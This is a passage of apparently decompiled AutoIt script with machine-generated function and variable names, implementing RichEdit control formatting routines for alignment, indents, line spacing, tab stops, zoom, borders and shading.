  4271. LOCAL $Local0055 =Fn0006($Arg00,$Var0256 ,$Local009F ,$Local00A0 , 0 ,"wparam" ,"struct*" )
  4272. IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4273. RETURN TRUE
  4274. ENDFUNC
  4275.  
  4276. Func Fn0152($Arg00,$ArgOpt01=DEFAULT )
  4277. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4278. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
  4279. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  4280. IF ISKEYWORD($ArgOpt01)THEN
  4281. DLLSTRUCTSETDATA($Local00A0 , 3 ,$Var0345 )
  4282. $ArgOpt01= 0
  4283. ELSE
  4284. IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4285. ENDIF
  4286. DLLSTRUCTSETDATA($Local00A0 , 2 ,$Var030C )
  4287. DLLSTRUCTSETDATA($Local00A0 ,0x000C ,$ArgOpt01)
  4288. LOCAL $Local00B1 =Fn013B($Arg00)
  4289. IF $Local00B1 [ 0 ]=$Local00B1 [ 1 ]THEN
  4290. RETURN Fn0006($Arg00,$Var0256 ,$Var0384 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
  4291. ELSE
  4292. RETURN Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
  4293. ENDIF
  4294. ENDFUNC
  4295.  
  4296. Func Fn0153($Arg00,$ArgOpt01=DEFAULT )
  4297. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4298. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
  4299. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  4300. IF ISKEYWORD($ArgOpt01)THEN
  4301. DLLSTRUCTSETDATA($Local00A0 , 3 ,$Var0346 )
  4302. $ArgOpt01= 0
  4303. ELSE
  4304. IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4305. ENDIF
  4306. DLLSTRUCTSETDATA($Local00A0 , 2 ,$Var0312 )
  4307. DLLSTRUCTSETDATA($Local00A0 , 6 ,$ArgOpt01)
  4308. LOCAL $Local00B1 =Fn013B($Arg00)
  4309. IF $Local00B1 [ 0 ]=$Local00B1 [ 1 ]THEN
  4310. RETURN Fn0006($Arg00,$Var0256 ,$Var0384 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
  4311. ELSE
  4312. RETURN Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
  4313. ENDIF
  4314. ENDFUNC
  4315.  
  4316. Func Fn0154($Arg00,$ArgOpt01=DEFAULT )
  4317. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4318. LOCAL $Local00D4 =FALSE
  4319. IF ISKEYWORD($ArgOpt01)THEN
  4320. $Local00D4 =TRUE
  4321. $ArgOpt01= 0
  4322. ELSE
  4323. IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4324. ENDIF
  4325. Fn0006($Arg00,$Var0254 ,$Local00D4 ,$ArgOpt01)
  4326. RETURN TRUE
  4327. ENDFUNC
  4328.  
  4329. Func Fn0155($Arg00,$Arg01)
  4330. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4331. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4332. IF $Arg01<0xFFFF THEN $Arg01= 0
  4333. Fn0006($Arg00,$Var0202 , 0 ,$Arg01)
  4334. RETURN TRUE
  4335. ENDFUNC
  4336.  
  4337. Func Fn0156($Arg00,$Arg01,$ArgOpt02=TRUE )
  4338. LOCAL CONST $Var0567 = 18.75
  4339. LOCAL $Var0568 ,$Var0569 ="",$Local009F
  4340. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4341. IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4342. IF ISSTRING($Arg01)THEN
  4343. IF $Arg01="" THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4344. LOCAL $Local00D5 =STRINGSPLIT($Arg01,";" )
  4345. LOCAL $Local00D6 =$Local00D5 [ 0 ]
  4346. FOR $Local00EB = 1 TO $Local00D6
  4347. IF NOT Fn0176($Local00D5 [$Local00EB ],">0" )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4348. $Var0569 &="int;"
  4349. NEXT
  4350. $Var0569 =STRINGTRIMRIGHT($Var0569 , 1 )
  4351. $Var0568 =DLLSTRUCTCREATE($Var0569 )
  4352. FOR $Local00EB = 1 TO $Local00D6
  4353. DLLSTRUCTSETDATA($Var0568 ,$Local00EB ,$Local00D5 [$Local00EB ]*$Var04B9 /$Var0567 )
  4354. NEXT
  4355. $Local009F =$Local00D6
  4356. ELSEIF ISNUMBER($Arg01)THEN
  4357. IF Fn0176($Arg01,">0" )THEN
  4358. $Var0568 =DLLSTRUCTCREATE("int" )
  4359. DLLSTRUCTSETDATA($Var0568 , 1 ,$Arg01*$Var04B9 /$Var0567 )
  4360. $Local009F = 1
  4361. ELSE
  4362. RETURN SETERROR(0x0400 , 9 ,FALSE )
  4363. ENDIF
  4364. ELSE
  4365. RETURN SETERROR(0x03FD , 0 ,FALSE )
  4366. ENDIF
  4367. LOCAL $Local00D7 =Fn0006($Arg00,$Var056A ,$Local009F ,$Var0568 , 0 ,"wparam" ,"struct*" )<> 0
  4368. IF $ArgOpt02 THEN Fn0080($Arg00)
  4369. RETURN $Local00D7
  4370. ENDFUNC
  4371.  
  4372. Func Fn0157($Arg00,$Arg01)
  4373. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4374. IF NOT Fn0176($Arg01,">0" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4375. LOCAL $Var056B ,$Var056C
  4376. SELECT
  4377. CASE NOT ($Arg01=0x0064 OR ($Arg01>=0x00C8 AND $Arg01<0x1900 ))
  4378. RETURN SETERROR(0x03FE , 0 ,FALSE )
  4379. CASE $Arg01>=0x0064
  4380. $Var056B =0x2710
  4381. $Var056C =0x2710 /($Arg01/0x0064 )
  4382. CASE ELSE
  4383. $Var056B =0x2710 *($Arg01/0x0064 )
  4384. $Var056C =0x2710
  4385. ENDSELECT
  4386. RETURN Fn0006($Arg00,$Var0280 ,$Var056B ,$Var056C )<> 0
  4387. ENDFUNC
  4388.  
  4389. Func Fn0158($Arg00,$Arg01)
  4390. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4391. IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4392. Fn0006($Arg00,$Var025A , 0 ,$Arg01)
  4393. RETURN TRUE
  4394. ENDFUNC
  4395.  
  4396. Func Fn0159($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
  4397. LOCAL $Local00D8 = 0
  4398. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4399. IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">0" ))THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4400. IF $ArgOpt02<>DEFAULT THEN
  4401. LOCAL $Local00D5 =STRINGSPLIT($ArgOpt02," " )
  4402. FOR $Local00EB = 1 TO UBOUND($Local00D5 )- 1
  4403. IF NOT STRINGISALPHA($Local00D5 [$Local00EB ])THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4404. NEXT
  4405. ENDIF
  4406. IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4407. IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04))THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
  4408. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
  4409. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  4410. IF $ArgOpt01<>DEFAULT THEN
  4411. $Local00D8 =$Var0332
  4412. DLLSTRUCTSETDATA($Local00A0 , 4 ,INT($ArgOpt01*0x0014 ))
  4413. ENDIF
  4414. IF $ArgOpt02<>DEFAULT THEN
  4415. IF STRINGLEN($ArgOpt02)>$Var038C - 1 THEN SETERROR(- 1 , 0 ,FALSE )
  4416. $Local00D8 =BITOR($Local00D8 ,$Var0318 )
  4417. DLLSTRUCTSETDATA($Local00A0 , 9 ,$ArgOpt02)
  4418. ENDIF
  4419. IF $ArgOpt03<>DEFAULT THEN
  4420. $Local00D8 =BITOR($Local00D8 ,$Var0310 )
  4421. DLLSTRUCTSETDATA($Local00A0 , 7 ,$ArgOpt03)
  4422. ENDIF
  4423. IF $ArgOpt04<>DEFAULT THEN
  4424. $Local00D8 =BITOR($Local00D8 ,$Var0322 )
  4425. DLLSTRUCTSETDATA($Local00A0 ,0x000D ,$ArgOpt04)
  4426. ENDIF
  4427. DLLSTRUCTSETDATA($Local00A0 , 2 ,$Local00D8 )
  4428. LOCAL $Local0055 =Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )
  4429. IF NOT $Local0055 THEN RETURN SETERROR(@ERROR+0x00C8 , 0 ,FALSE )
  4430. RETURN TRUE
  4431. ENDFUNC
  4432.  
  4433. Func Fn015A($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT ,$ArgOpt05=TRUE )
  4434. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4435. IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">0" ))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4436. IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">0" ))THEN RETURN SETERROR(0x2852 , 0 ,FALSE )
  4437. IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03,">0" ))THEN RETURN SETERROR(0x03FF , 0 ,FALSE )
  4438. IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04,">0" ))THEN RETURN SETERROR(0x0400 , 0 ,FALSE )
  4439. IF @NumParams = 1 THEN
  4440. LOCAL $Local002F =CONTROLGETPOs($Arg00,"","")
  4441. $ArgOpt01= 2
  4442. $ArgOpt02= 2
  4443. $ArgOpt03=$Local002F [ 2 ]
  4444. $ArgOpt04=$Local002F [ 3 ]
  4445. Fn015A($Arg00,$ArgOpt01,$ArgOpt02,$ArgOpt03,$ArgOpt04)
  4446. RETURN TRUE
  4447. ELSE
  4448. LOCAL $Local00D5 =Fn012A($Arg00)
  4449. IF $ArgOpt01=DEFAULT THEN
  4450. $ArgOpt01=$Local00D5 [ 0 ]
  4451. ENDIF
  4452. IF $ArgOpt02=DEFAULT THEN
  4453. $ArgOpt02=$Local00D5 [ 1 ]
  4454. ENDIF
  4455. IF $ArgOpt03=DEFAULT THEN
  4456. $ArgOpt03=$Local00D5 [ 2 ]
  4457. ENDIF
  4458. IF $ArgOpt04=DEFAULT THEN
  4459. $ArgOpt04=$Local00D5 [ 3 ]
  4460. ENDIF
  4461. IF $ArgOpt01>=$ArgOpt03 THEN RETURN SETERROR(0x0401 , 0 ,FALSE )
  4462. IF $ArgOpt02>=$ArgOpt04 THEN RETURN SETERROR(0x0402 , 0 ,FALSE )
  4463. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  4464. DLLSTRUCTSETDATA($Local0017 ,"Left" ,NUMBER($ArgOpt01))
  4465. DLLSTRUCTSETDATA($Local0017 ,"Top" ,NUMBER($ArgOpt02))
  4466. DLLSTRUCTSETDATA($Local0017 ,"Right" ,NUMBER($ArgOpt03))
  4467. DLLSTRUCTSETDATA($Local0017 ,"Bottom" ,NUMBER($ArgOpt04))
  4468. LOCAL $Local00D9 =Fn0102($ArgOpt05,$Var056D ,$Var056E )
  4469. Fn0006($Arg00,$Local00D9 , 0 ,$Local0017 , 0 ,"wparam" ,"struct*" )
  4470. ENDIF
  4471. RETURN TRUE
  4472. ENDFUNC
  4473.  
  4474. Func Fn015B($Arg00,$ArgOpt01=TRUE )
  4475. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4476. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4477. Fn0006($Arg00,$Var056F ,$ArgOpt01)
  4478. RETURN TRUE
  4479. ENDFUNC
  4480.  
  4481. Func Fn015C($Arg00,$Arg01)
  4482. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4483. LOCAL $Local00B5
  4484. SWITCH $Arg01
  4485. CASE "l"
  4486. $Local00B5 =$Var0390
  4487. CASE "c"
  4488. $Local00B5 =$Var0394
  4489. CASE "r"
  4490. $Local00B5 =$Var0392
  4491. CASE "j"
  4492. $Local00B5 =$Var0396
  4493. CASE "w"
  4494. $Local00B5 =$Var0398
  4495. CASE ELSE
  4496. RETURN SETERROR(0x0065 , 0 ,FALSE )
  4497. ENDSWITCH
  4498. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4499. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  4500. DLLSTRUCTSETDATA($Local00B4 , 2 ,$Var039E )
  4501. DLLSTRUCTSETDATA($Local00B4 , 8 ,$Local00B5 )
  4502. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4503. ENDFUNC
  4504.  
  4505. Func Fn015D($Arg00,$Arg01)
  4506. LOCAL ENUM $Var0551 = 0 ,$Var0570 ,$Var0552 ,$Var0553
  4507. LOCAL CONST $Local00C2 [ 9 ][ 4 ]=[["fpg" ,$Var03C0 ,$Var03D0 ,FALSE ],["hyp" ,$Var03C6 ,$Var03D6 ,TRUE ],["kpt" ,$Var03BC ,$Var03CC ,FALSE ],["kpn" ,$Var03BE ,$Var03CE ,FALSE ],["pwo" ,$Var03C4 ,$Var03D4 ,FALSE ],["r2l" ,$Var03BA ,$Var03CA ,FALSE ],["row" ,$Var03B4 ,$Var039A ,FALSE ],["sbs" ,$Var03C8 ,$Var03D8 ,FALSE ],["sln" ,$Var03C2 ,$Var03D2 ,FALSE ]]
  4508. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4509. IF MOD(STRINGLEN($Arg01)+ 1 , 5 )<> 0 THEN RETURN SETERROR(0x03FF , 0 ,FALSE )
  4510. LOCAL $Local00D5 =STRINGSPLIT($Arg01,";" )
  4511. LOCAL $Local00A1 = 0 ,$Local00A2 = 0 ,$Local00DD ,$Local00CC
  4512. FOR $Local00EB = 1 TO UBOUND($Local00D5 , 1 )- 1
  4513. $Local00DD =STRINGMID($Local00D5 [$Local00EB ], 2 )
  4514. $Local00CC =- 1
  4515. FOR $Var0558 = 0 TO UBOUND($Local00C2 , 1 )- 1
  4516. IF $Local00C2 [$Var0558 ][$Var0551 ]=$Local00DD THEN
  4517. $Local00CC =$Var0558
  4518. EXITLOOP
  4519. ENDIF
  4520. NEXT
  4521. IF $Local00CC =- 1 THEN RETURN SETERROR(0x03FE ,$Local00DD ,FALSE )
  4522. $Local00A1 =BITOR($Local00A1 ,$Local00C2 [$Local00CC ][$Var0570 ])
  4523. $Local00DD =STRINGLEFT($Local00D5 [$Local00EB ], 1 )
  4524. SWITCH $Local00DD
  4525. CASE "+"
  4526. IF NOT $Local00C2 [$Local00CC ][$Var0553 ]THEN
  4527. $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][$Var0552 ])
  4528. ENDIF
  4529. CASE "-"
  4530. IF $Local00C2 [$Local00CC ][$Var0553 ]THEN
  4531. $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][$Var0552 ])
  4532. ENDIF
  4533. CASE ELSE
  4534. RETURN SETERROR(0x03FD ,$Local00DD ,FALSE )
  4535. ENDSWITCH
  4536. NEXT
  4537. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4538. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  4539. DLLSTRUCTSETDATA($Local00B4 , 2 ,$Local00A1 )
  4540. DLLSTRUCTSETDATA($Local00B4 , 4 ,$Local00A2 )
  4541. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4542. ENDFUNC
  4543.  
  4544. Func Fn015E($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
  4545. LOCAL $Local00B7
  4546. LOCAL CONST $Var0554 [ 6 ][ 2 ]=[["l" , 1 ],["r" , 2 ],["t" , 4 ],["b" , 8 ],["i" ,0x0010 ],["o" ,0x0020 ]]
  4547. LOCAL CONST $Var0555 [0x000C ]=["none" , .75 , 1.5 , 2.25 , 3 , 4.5 , 6 ,".75d" ,"1.5d" ,"2.25d" ,".75g" ,".75gd" ]
  4548. LOCAL CONST $Var0556 =";blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;aut;"
  4549. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4550. IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04,">=0" ))THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
  4551. IF $ArgOpt01="" THEN
  4552. $Local00B7 = 0
  4553. $ArgOpt04= 0
  4554. ELSE
  4555. IF $ArgOpt01=DEFAULT OR $ArgOpt02=DEFAULT OR $ArgOpt03=DEFAULT OR $ArgOpt04=DEFAULT THEN
  4556. LOCAL $Local00D5 =STRINGSPLIT(Fn0133($Arg00),";" )
  4557. IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
  4558. IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
  4559. IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
  4560. IF $ArgOpt04=DEFAULT THEN $ArgOpt04=$Local00D5 [ 4 ]
  4561. ENDIF
  4562. LOCAL $Local00DA = 0 ,$Local00CC ,$Local00DD
  4563. FOR $Local00EB = 1 TO STRINGLEN($ArgOpt01)
  4564. $Local00DD =STRINGMID($ArgOpt01,$Local00EB , 1 )
  4565. $Local00CC =- 1
  4566. FOR $Var0558 = 0 TO UBOUND($Var0554 , 1 )- 1
  4567. IF $Var0554 [$Var0558 ][ 0 ]=$Local00DD THEN
  4568. $Local00CC =$Var0558
  4569. EXITLOOP
  4570. ENDIF
  4571. NEXT
  4572. IF $Local00CC =- 1 THEN RETURN SETERROR(0x0066 ,$Local00DD ,FALSE )
  4573. $Local00DA =BITOR($Local00DA ,$Var0554 [$Local00CC ][ 1 ])
  4574. NEXT
  4575. $Local00CC =- 1
  4576. FOR $Local00EB = 0 TO UBOUND($Var0555 , 1 )- 1
  4577. IF $ArgOpt02=$Var0555 [$Local00EB ]THEN
  4578. $Local00CC =$Local00EB
  4579. EXITLOOP
  4580. ENDIF
  4581. NEXT
  4582. IF $Local00CC =- 1 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4583. LOCAL $Local00DB =$Local00CC
  4584. $Local00CC =STRINGINSTR($Var0556 ,";" &$ArgOpt03&";" )
  4585. IF $Local00CC = 0 THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4586. LOCAL $Local00DC =INT($Local00CC / 4 )
  4587. IF $Local00DC =0x0010 THEN
  4588. $Local00DA =BITOR($Local00DA ,0x0040 )
  4589. $Local00DC = 0
  4590. ENDIF
  4591. $Local00B7 =$Local00DA +BITSHIFT($Local00DB ,- 8 )+BITSHIFT($Local00DC ,-0x000C )
  4592. ENDIF
  4593. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4594. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  4595. DLLSTRUCTSETDATA($Local00B4 ,"wBorderSpace",$ArgOpt04*$Var04B9 )
  4596. DLLSTRUCTSETDATA($Local00B4 ,"wBorders" ,$Local00B7 )
  4597. DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03A6 )
  4598. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4599. ENDFUNC
  4600.  
  4601. Func Fn015F($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT )
  4602. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4603. IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4604. IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">=0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4605. IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4606. LOCAL $Local00DD =Fn0134($Arg00)
  4607. LOCAL $Local00D5 =STRINGSPLIT($Local00DD ,";" )
  4608. IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
  4609. IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
  4610. IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
  4611. IF $ArgOpt01< 0 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4612. IF $ArgOpt01+$ArgOpt03< 0 THEN RETURN SETERROR(0x00C8 , 0 ,FALSE )
  4613. IF STRINGINSTR("+-" ,STRINGLEFT($ArgOpt01, 1 ))<> 0 THEN $ArgOpt01=$Local00D5 [ 1 ]+$ArgOpt01
  4614. LOCAL $Local00B8 =$ArgOpt01+$ArgOpt03
  4615. LOCAL $Local00B9 =-$ArgOpt03
  4616. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var052D )
  4617. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  4618. DLLSTRUCTSETDATA($Local00B4 ,"dxStartIndent",$Local00B8 *$Var04B9 )
  4619. DLLSTRUCTSETDATA($Local00B4 ,"dxOffset" ,$Local00B9 *$Var04B9 )
  4620. DLLSTRUCTSETDATA($Local00B4 ,"dxRightIndent",$ArgOpt02*$Var04B9 )
  4621. DLLSTRUCTSETDATA($Local00B4 , 2 ,BITOR($Var03AA ,$Var03AC ,$Var03A8 ))
  4622. LOCAL $Local0055 =Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )
  4623. IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4624. RETURN TRUE
  4625. ENDFUNC
  4626.  
  4627. Func Fn0160($Arg00,$Arg01,$ArgOpt02=DEFAULT ,$ArgOpt03=FALSE )
  4628. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4629. IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4630. IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4631. LOCAL $Var0571 ,$Var0572 ,$Var0573 ,$Var0574 ,$Local00C4
  4632. Fn0178($Arg01,$ArgOpt03,$Var0571 ,$Var0572 ,$Var0573 ,$Var0574 ,$Local00C4 )
  4633. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,FALSE )
  4634. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4635. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  4636. IF BITAND($Var0571 ,$Var039C )THEN DLLSTRUCTSETDATA($Local00B4 , 3 ,$Var0572 )
  4637. IF BITAND($Var0571 ,$Var03A4 )THEN DLLSTRUCTSETDATA($Local00B4 ,0x0013 ,$Var0573 )
  4638. IF BITAND($Var0571 ,$Var03A2 )THEN DLLSTRUCTSETDATA($Local00B4 ,0x0014 ,$Var0574 )
  4639. IF BITAND($Var0571 ,$Var03B2 )THEN
  4640. LOCAL $Var0575
  4641. IF $ArgOpt02=DEFAULT THEN
  4642. LOCAL $Local00C2 =Fn0129($Arg00)
  4643. LOCAL $Local00C3 =$Local00C2 [ 0 ]
  4644. $Var0575 =$Local00C4 *$Local00C3 *0x0014
  4645. ELSE
  4646. $Var0575 =$ArgOpt02*$Var04B9
  4647. ENDIF
  4648. DLLSTRUCTSETDATA($Local00B4 ,0x0015 ,$Var0575 )
  4649. ENDIF
  4650. DLLSTRUCTSETDATA($Local00B4 , 2 ,$Var0571 )
  4651. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4652. ENDFUNC
  4653.  
  4654. Func Fn0161($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
  4655. LOCAL $Local00C6 = 0
  4656. LOCAL CONST $Var0576 =";non;dhz;dvt;ddd;dud;dgr;dtr;lhz;lrt;ldd;lud;lgr;ltr;"
  4657. LOCAL CONST $Var0556 =";blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;"
  4658. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4659. IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">=0" ))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4660. IF $ArgOpt01<>DEFAULT OR $ArgOpt02<>DEFAULT OR $ArgOpt03<>DEFAULT OR $ArgOpt04<>DEFAULT THEN
  4661. LOCAL $Local00D5 =STRINGSPLIT(Fn0136($Arg00),";" )
  4662. IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
  4663. IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
  4664. IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
  4665. IF $ArgOpt04=DEFAULT THEN $ArgOpt04=$Local00D5 [ 4 ]
  4666. ENDIF
  4667. IF $ArgOpt01< 0 OR $ArgOpt01>0x0064 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4668. LOCAL $Local001C =STRINGINSTR($Var0576 ,";" &$ArgOpt02&";" )
  4669. IF $Local001C = 0 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4670. LOCAL $Local00C0 =INT($Local001C / 4 )
  4671. LOCAL $Local00DE =BITSHIFT(BITAND($Local00C6 ,0x00F0 ), 4 )
  4672. $Local001C =STRINGINSTR($Var0556 ,";" &$ArgOpt03&";" )
  4673. IF $Local001C = 0 THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4674. $Local00DE =INT($Local001C / 4 )
  4675. $Local001C =STRINGINSTR($Var0556 ,";" &$ArgOpt04&";" )
  4676. IF $Local001C = 0 THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
  4677. LOCAL $Local00DF =INT($Local001C / 4 )
  4678. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4679. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  4680. DLLSTRUCTSETDATA($Local00B4 ,"wShadingWeight",$ArgOpt01)
  4681. $Local001C =$Local00C0 +BITSHIFT($Local00DE ,- 4 )+BITSHIFT($Local00DF ,- 8 )
  4682. DLLSTRUCTSETDATA($Local00B4 ,"wShadingStyle",$Local001C )
  4683. DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03DA )
  4684. LOCAL $Local0055 =Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )
  4685. IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4686. RETURN TRUE
  4687. ENDFUNC
  4688.  
  4689. Func Fn0162($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT )
  4690. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4691. IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">=0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4692. IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03,">=0" ))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
